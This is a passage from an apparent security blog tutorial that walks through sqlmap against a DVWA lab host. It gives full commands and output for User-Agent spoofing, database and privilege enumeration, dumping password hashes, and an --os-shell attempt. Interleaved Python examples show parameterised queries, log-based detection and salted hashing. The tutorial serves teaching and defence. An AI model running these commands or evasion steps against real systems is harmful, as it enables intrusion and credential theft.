Learning by practising: Continuing SQL Injection with SQLMap

News.nextcloud.asia
A while ago I wrote this post on performing SQL injection manually. In this post we leverage one of the most common tools used for SQL injection. In the next two posts we will perform log and packet analysis to detect the activity carried out by SQLMap.

To exploit a web application, an attacker must at least understand the application's basic operation. For this post we will use Damn Vulnerable Web Application (DVWA) and its SQLi page.

When we first access the application we are presented with a login screen. The default credentials are the username "admin" and the password "password". In this example our URL is "http://10.0.0.108/dvwa/login.php".

After we log in, navigate to the SQLi page and enter the value "1", we get:

Now that we know entering "1" returns some results, what happens if we enter a single tick such as ' ? The server returns the following error:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1

From the above we can conclude that this site is likely vulnerable to SQL injection attacks. Let's run the testing using SQLMap.
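To see why a lone quote produces that error, here is an added example that is not part of the original post: a Python function that builds the lookup query by pasting the "id" value into the SQL text, the way the DVWA low-security SQLi page does, beside one that passes the value as a bound parameter. SQLite stands in for MariaDB (an assumption; an unbalanced quote is a syntax error in both engines), and the table rows are constructed from the users sqlmap dumps later in the post.

```python
import sqlite3

# Constructed stand-in for the dvwa.users table (names taken from the rows
# sqlmap dumps later in the post). SQLite replaces MariaDB here: an assumption,
# but an unbalanced quote is a syntax error in both engines.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me"),
         (4, "Pablo", "Picasso"), (5, "Bob", "Smith")],
    )
    return conn


def vulnerable_lookup(conn, user_input):
    # The DVWA "low" page pastes the id parameter straight into the SQL text.
    # A lone quote in user_input unbalances the string literal, which is the
    # "You have an error in your SQL syntax ... near '''''" message seen above.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_input}'"
    return conn.execute(query).fetchall()


def safe_lookup(conn, user_input):
    # Bound parameter: the driver sends the value separately from the statement,
    # so a quote is just data and can never change the query structure.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_input,)).fetchall()


def run_both(conn, user_input):
    """Feed the same input to both builders; capture the error the vulnerable one raises."""
    try:
        vulnerable = vulnerable_lookup(conn, user_input)
    except sqlite3.OperationalError as exc:
        vulnerable = f"error: {exc}"
    return {"vulnerable": vulnerable, "safe": safe_lookup(conn, user_input)}


if __name__ == "__main__":
    db = build_db()
    for probe in ("1", "'"):
        print(repr(probe), run_both(db, probe))
```

With "1" both variants return the admin row; with "'" the concatenated query dies with a tokenizer error while the parameterised one simply finds no matching row. That difference in behaviour on a single quote is the whole basis of the heuristic test sqlmap runs first, and the parameterised form is the fix.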

If we look at the URL from a legitimate request, we see:

http://10.0.0.108/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

From the above we see two parameters. These are "id" and "Submit". Now let's use these with SQLMap.

When we run SQLMap we get:

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#"
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.6#stable}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:58:49 /2020-06-24/

[10:58:50] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.0.0.108:80/dvwa/login.php'. Do you want to follow? [Y/n]n

Above we see that we are being redirected back to the login page 'http://10.0.0.108:80/dvwa/login.php'. It would be a bit difficult for us to authenticate from the command line and get back to that page. Fortunately for us, we can use the "--cookie" argument.

Considering we logged in to the application earlier, we can basically reuse that cookie. Alternatively, if you have another user's cookie, you may be able to authenticate with that cookie as well. Let's use the cookie.

To find the cookie to use, I right-clicked on the page in question (remember I had logged in earlier), selected "Inspect" and then selected the "Console" tab. Once in the console, I ran "document.cookie". This returned the cookie "security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0".

Now that we have the cookie, let's use it with SQLMap. Let's also take the opportunity to flush the previous session information for the current target, using "--flush-session".

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.6#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:18:19 /2020-06-24/

[11:18:20] [INFO] testing connection to the target URL
[11:18:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:18:21] [INFO] testing if the target URL content is stable
[11:18:21] [INFO] target URL content is stable
[11:18:21] [INFO] testing if POST parameter 'id' is dynamic
[11:18:22] [WARNING] POST parameter 'id' does not appear to be dynamic
[11:18:22] [INFO] heuristic (basic) test shows that POST parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:18:22] [INFO] heuristic (XSS) test shows that POST parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:18:22] [INFO] testing for SQL injection on POST parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
.... <truncated for brevity> .....
11:20:35] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 144 HTTP(s) requests:
.... <truncated for brevity> .....

It looks like we can now confirm there is a vulnerability, which we may be able to exploit. We can see this above from the 3 lines in bold.

Now that we know this works, let's enumerate the "banner" via the "--banner" argument. We will also use the "--batch" option, as no user input is currently needed. Additionally, as reported above, "it looks like the back-end DBMS is 'MySQL'". Let's specify this via "--dbms=MySQL".

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --banner
.... <truncated for brevity> .....

---
[12:12:56] [INFO] the back-end DBMS is MySQL
[12:12:56] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
banner: '10.1.30-MariaDB'
[12:12:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:12:57 /2020-06-24/

From the above we see the backend database is "MySQL >= 5.0 (MariaDB fork)". Specifically we see the banner "banner: '10.1.30-MariaDB'".

At this point we could search the internet for vulnerabilities associated with "10.1.30-MariaDB".

Let's continue this journey. However, before we enumerate the current user ("--current-user"), let's try to blend in. By default, the version of SQLMap I'm using sends the user agent "sqlmap/1.4.6#stable (http://sqlmap.org)". Let's make this look like a regular browser by leveraging the "--user-agent" argument. Let's borrow a user agent from WhatIsMyBrowser.com. Specifically, let's take the Presto "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18" user agent.

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --user-agent="Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18" --current-user

.... <truncated for brevity> .....

---
[12:28:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:28:56] [INFO] fetching current user
current user: '[email protected]'
[12:28:56] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:28:56 /2020-06-24/

Above we see "current user: '[email protected]'". Nothing like running the program as "root". Maybe this will be beneficial for us later.

OK, the above was cool in that we could specify the user agent. How about, rather than specifying one, we let SQLMap do this itself. As we look to enumerate the current database ("--current-db"), let's also use "--random-agent".

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --current-db
....

[12:34:38] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8) Gecko/20051111 Firefox/1.5 Ubuntu' from file '/usr/share/sqlmap/data/txt/user-agents.txt'

.... <truncated for brevity> .....

---
[12:35:05] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:35:05] [INFO] fetching current database
current database: 'dvwa'
[12:35:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:35:05 /2020-06-24/

We see above that the user agent was selected from the file "user-agents.txt", along with "current database: 'dvwa'". Let's see what other databases may exist, or that we may be able to access, using "--dbs".
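The default "sqlmap/1.4.6#stable" header mentioned earlier and the "--random-agent" switch used here are exactly the signals the next posts in this series will be looking for on the server side. As an added example, not from the original post, the following Python script runs over a few constructed Apache "combined" format access-log lines and flags a client on three signals: the stock "sqlmap/..." User-Agent, SQL metacharacters in the query string, and request volume per client (the post reports 144 requests to confirm a single injection point), the last of which survives a spoofed or random User-Agent. The client addresses, timestamps and the threshold of 20 requests per 60 seconds are assumptions made for the sample.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx "combined" log format. The sample lines below are constructed
# for this example; they are not taken from the post's lab.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Tokens that almost never belong in a numeric "id" parameter.
SUSPICIOUS = ("'", '"', "--", "/*", " or ", " and ", "union", "sleep(", "benchmark(")

BURST_WINDOW_S = 60
BURST_THRESHOLD = 20  # assumption; sqlmap needed 144 requests against DVWA above


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def is_sqlmap_default_ua(ua):
    # The tool's stock header, as printed in the post: "sqlmap/1.4.6#stable (http://sqlmap.org)"
    ua = ua.lower()
    return ua.startswith("sqlmap/") or "sqlmap.org" in ua


def suspicious_query(target):
    # Decode %27 and friends before looking, otherwise the quote hides as "%27".
    query = unquote_plus(urlsplit(target).query).lower()
    return [tok for tok in SUSPICIOUS if tok in query]


def analyze(lines):
    """Return {client_ip: set(reasons)} for clients that deserve a second look."""
    findings = defaultdict(set)
    times_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        if is_sqlmap_default_ua(rec["ua"]):
            findings[ip].add("sqlmap default User-Agent")
        if suspicious_query(rec["target"]):
            findings[ip].add("SQL metacharacters in query string")
        times_by_ip[ip].append(rec["ts"])
    # A spoofed or random User-Agent hides the banner, not the request rate:
    # sliding window over each client's sorted timestamps.
    for ip, times in times_by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > BURST_WINDOW_S:
                start += 1
            if end - start + 1 > BURST_THRESHOLD:
                findings[ip].add(f"more than {BURST_THRESHOLD} requests in {BURST_WINDOW_S}s")
                break
    return dict(findings)


def sample_log():
    """Constructed lines: one browser, one stock sqlmap run, one run hiding behind the Opera UA."""
    path = "/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
    browser = [f'10.0.0.5 - - [24/Jun/2020:11:18:21 -0400] "GET {path} HTTP/1.1" 200 4821 "-" '
               '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/77.0"']
    stock = ['10.0.0.9 - - [24/Jun/2020:11:18:22 -0400] '
             '"GET /dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 4702 "-" '
             '"sqlmap/1.4.6#stable (http://sqlmap.org)"']
    spoofed = [f'10.0.0.12 - - [24/Jun/2020:12:28:{i:02d} -0400] "GET {path} HTTP/1.1" 200 4821 "-" '
               '"Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18"'
               for i in range(25)]
    return browser + stock + spoofed


if __name__ == "__main__":
    for ip, reasons in analyze(sample_log()).items():
        print(ip, sorted(reasons))
```

One caveat the sample makes visible: the sqlmap runs in this post send "id" in a POST body ("--data"), and a standard access log records only the request line, so the metacharacter check sees nothing for those. The GET form of the URL shown earlier is what the sample uses; for POST traffic the same check has to run on a request-body source (a WAF log, a reverse proxy that logs bodies, or the packet captures the next posts will look at), while the User-Agent and rate signals work on either.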

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --dbs

.... <truncated for brevity> .....

---
[12:41:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:41:29] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] mysql
[*] nowasp
[*] performance_schema
[*] phpmyadmin
[*] test

Above we see the list of available databases. Looks like we could have some fun with a few of these. However, let's stick with "dvwa" for now. We already know the current user is "[email protected]". Let's see if this user is also a database administrator via "--is-dba".

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --is-dba

.... <truncated for brevity> .....
---
[12:45:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:45:12] [INFO] testing if current user is DBA
[12:45:12] [INFO] fetching current user
current user is DBA: True
[12:45:13] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:45:13 /2020-06-24/

Looks like the current user is a Database Administrator. Let's validate the privileges of the various users via "--privileges".

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --privileges
.... <truncated for brevity> .....
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:49:51] [INFO] fetching database users privileges
database management system users privileges:
[*] ''@'localhost' [1]:
    privilege: USAGE
[*] 'pma'@'localhost' [1]:
    privilege: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'::1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

[12:49:51] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:49:51 /2020-06-24/


Liking the progress made so far, let's now look at the roles of the various users via "--roles".

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --roles

<.... truncated for brevity ..... >
[12:51:48] [INFO] fetched random HTTP User-Agent header value 'Opera/9.01 (X11; Linux i686; U; en)' from file '/usr/share/sqlmap/data/txt/user-agents.txt


12:52:16] [INFO] fetching database users privileges
database management system users roles:
[*] ''@'localhost' [1]:
    role: USAGE
[*] 'pma'@'localhost' [1]:
    role: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
    role: CREATE ROUTINE
    role: CREATE TABLESPACE
    role: CREATE TEMPORARY TABLES
    role: CREATE USER
    role: CREATE VIEW
    role: DELETE
    role: DROP
    role: EVENT
    role: EXECUTE
    role: FILE
    role: INDEX
    role: INSERT
    role: LOCK TABLES
    role: PROCESS
    role: REFERENCES
    role: RELOAD
    role: REPLICATION CLIENT
    role: REPLICATION SLAVE
    role: SELECT
    role: SHOW DATABASES
    role: SHOW VIEW
    role: SHUTDOWN
    role: SUPER
    role: TRIGGER
    role: UPDATE
[*] 'root'@'::1' (administrator) [28]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
    role: CREATE ROUTINE
    role: CREATE TABLESPACE
    role: CREATE TEMPORARY TABLES
    role: CREATE USER
    role: CREATE VIEW
    role: DELETE
    role: DROP
    role: EVENT
    role: EXECUTE
    role: FILE
    role: INDEX
    role: INSERT
    role: LOCK TABLES
    role: PROCESS
    role: REFERENCES
    role: RELOAD
    role: REPLICATION CLIENT
    role: REPLICATION SLAVE
    role: SELECT
    role: SHOW DATABASES
    role: SHOW VIEW
    role: SHUTDOWN
    role: SUPER
    role: TRIGGER
    role: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
    role: CREATE ROUTINE
    role: CREATE TABLESPACE
    role: CREATE TEMPORARY TABLES
    role: CREATE USER
    role: CREATE VIEW
    role: DELETE
    role: DROP
    role: EVENT
    role: EXECUTE
    role: FILE
    role: INDEX
    role: INSERT
    role: LOCK TABLES
    role: PROCESS
    role: REFERENCES
    role: RELOAD
    role: REPLICATION CLIENT
    role: REPLICATION SLAVE
    role: SELECT
    role: SHOW DATABASES
    role: SHOW VIEW
    role: SHUTDOWN
    role: SUPER
    role: TRIGGER
    role: UPDATE

[12:52:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:52:16 /2020-06-24/

With the above, we can infer who the users of this system are based on the query we made for privileges. However, let's confirm the users via "--users".

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --random-agent --users
<... truncated for brevity ...>
---
[12:59:59] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:59:59] [INFO] fetching database users
database management system users [5]:
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'

[12:59:59] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:59:59 /2020-06-24/

Now let's look at retrieving the passwords via "--passwords". Let's also remove the "--batch" option. This allows us to now interact with SQLMap.

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --batch --random-agent --passwords

<... truncated for brevity ...>


[13:04:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:04:09] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] 
[13:04:27] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL

[13:04:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 13:04:27 /2020-06-24/

Now let's look at the tables within the various databases.

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --batch --tables

---
[13:17:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:17:56] [INFO] fetching database names
[13:17:56] [INFO] fetching tables for databases: 'dvwa, information_schema, mysql, nowasp, performance_schema, phpmyadmin, test'                                                                                                                        
Database: dvwa
[2 tables]
+----------------------------------------------------+
| guestbook                                          |
| users                                              |
+----------------------------------------------------+

Database: information_schema
[78 tables]
+----------------------------------------------------+
| ALL_PLUGINS                                        |
| APPLICABLE_ROLES                                   |
<.... truncated for brevity .... >
| STATISTICS                                         |
| TABLES                                             |
+----------------------------------------------------+

Database: mysql
[34 tables]
+----------------------------------------------------+
| db                                                 |
| event                                              |
| user                                               |
<.... truncated for brevity .... >
| time_zone_transition                               |
| time_zone_transition_type                          |
+----------------------------------------------------+

Database: nowasp
[13 tables]
+----------------------------------------------------+
| accounts                                           |
| balloon_tips                                       |
| blogs_table                                        |
<.... truncated for brevity .... >
| user_poll_results                                  |
| youtubevideos                                      |
+----------------------------------------------------+

Database: performance_schema
[52 tables]
+----------------------------------------------------+
| accounts                                           |
| cond_instances                                     |
| events_stages_current                              |
<.... truncated for brevity .... >
| users                                              |
+----------------------------------------------------+

Database: phpmyadmin
[19 tables]
+----------------------------------------------------+
| pma__bookmark                                      |
| pma__central_columns                               |
<.... truncated for brevity .... >
| pma__users                                         |
+----------------------------------------------------+

[13:17:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 13:17:57 /2020-06-24/

While the information above is truncated, you can see that we have basically dumped all the tables from the various databases. We can now focus on the structure of a specific table by executing "-D" for a specific database, "-T" for a specific table and "--columns".

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent -D dvwa -T users --columns

---
[13:29:19] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:29:19] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| password     | varchar(32) |
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| user_id      | int(6)      |
+--------------+-------------+

[13:29:19] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 13:29:19 /2020-06-24/

Now let's read all the records in the "users" table within the "dvwa" database via "--sql-query".

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent -D dvwa --sql-query="select * from users"

<.... truncated for brevity ....>

---
[13:33:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:33:52] [INFO] fetching SQL SELECT statement query output: 'select * from users'
[13:33:52] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[13:33:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[13:33:52] [INFO] fetching current database
[13:33:52] [INFO] fetching columns for table 'users' in database 'dvwa'
[13:33:52] [INFO] the query with expanded column name(s) is: SELECT `password`, `user`, avatar, failed_login, first_name, last_login, last_name, user_id FROM users
select * from users [5]:
[*] 5f4dcc3b5aa765d61d8327deb882cf99, admin, http://localhost/DVWA/hackable/users/admin.jpg, 0, admin, 2018-02-05 01:58:15, admin, 1
[*] e99a18c428cb38d5f260853678922e03, gordonb, http://localhost/DVWA/hackable/users/gordonb.jpg, 0, Gordon, 2018-02-05 01:58:15, Brown, 2
[*] 8d3533d75ae2c3966d7e0d4fcc69216b, 1337, http://localhost/DVWA/hackable/users/1337.jpg, 0, Hack, 2018-02-05 01:58:15, Me, 3
[*] 0d107d09f5bbe40cade3de5c71e9e9b7, pablo, http://localhost/DVWA/hackable/users/pablo.jpg, 0, Pablo, 2018-02-05 01:58:15, Picasso, 4
[*] 5f4dcc3b5aa765d61d8327deb882cf99, smithy, http://localhost/DVWA/hackable/users/smithy.jpg, 0, Bob, 2018-02-05 01:58:15, Smith, 5

[13:33:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 13:33:52 /2020-06-24/
With the information returned above, we can crack the passwords using another tool or simply copy and paste them into crackstation.net.
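The dumped values are unsalted MD5 (32 hex characters), and "admin" and "smithy" share the value 5f4dcc3b5aa765d61d8327deb882cf99, which means they share a password and one crack covers both. As an added example that is not from the original post, this Python code finds such collisions in the dumped rows and shows the storage format that removes the problem: a random per-user salt with PBKDF2-HMAC-SHA256 from the standard library, so equal passwords no longer produce equal hashes and each guess has to be recomputed per user. The iteration count and the record layout are assumptions.

```python
import hashlib
import hmac
import os

# (hash, user) pairs as sqlmap printed them for dvwa.users in the post.
DUMPED = [
    ("5f4dcc3b5aa765d61d8327deb882cf99", "admin"),
    ("e99a18c428cb38d5f260853678922e03", "gordonb"),
    ("8d3533d75ae2c3966d7e0d4fcc69216b", "1337"),
    ("0d107d09f5bbe40cade3de5c71e9e9b7", "pablo"),
    ("5f4dcc3b5aa765d61d8327deb882cf99", "smithy"),
]


def looks_like_md5(h):
    """32 hex characters and nothing else: the shape of a raw, unsalted MD5 digest."""
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h.lower())


def shared_hashes(rows):
    """Group users by identical hash; with an unsalted hash, equal digests mean equal passwords."""
    by_hash = {}
    for digest, user in rows:
        by_hash.setdefault(digest, []).append(user)
    return {digest: users for digest, users in by_hash.items() if len(users) > 1}


# Assumed storage layout: algorithm$iterations$salt_hex$dk_hex, one random salt per record.
def hash_password(password, salt=None, iterations=600_000):
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters))
    # Constant-time comparison so the check itself leaks nothing about the stored digest.
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("all raw MD5:", all(looks_like_md5(h) for h, _ in DUMPED))
    print("users sharing a hash:", shared_hashes(DUMPED))
    a = hash_password("same secret")
    b = hash_password("same secret")
    print("same password, different records:", a != b)
    print("verify:", verify_password("same secret", a), verify_password("other", a))
```

The collision check is the defender's quick read of any credential dump: if the same digest appears twice, the hash is unsalted, and every user with a common password falls to one lookup in a precomputed table, which is exactly what a site like crackstation.net is.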

At this point there are many other things we could do, such as reading and writing files, etc. However, let's try to gain access to the underlying operating system via the "--os-shell" command.

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --random-agent -D dvwa --os-shell

<.... Truncated for brevity ....>
---
[13:42:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
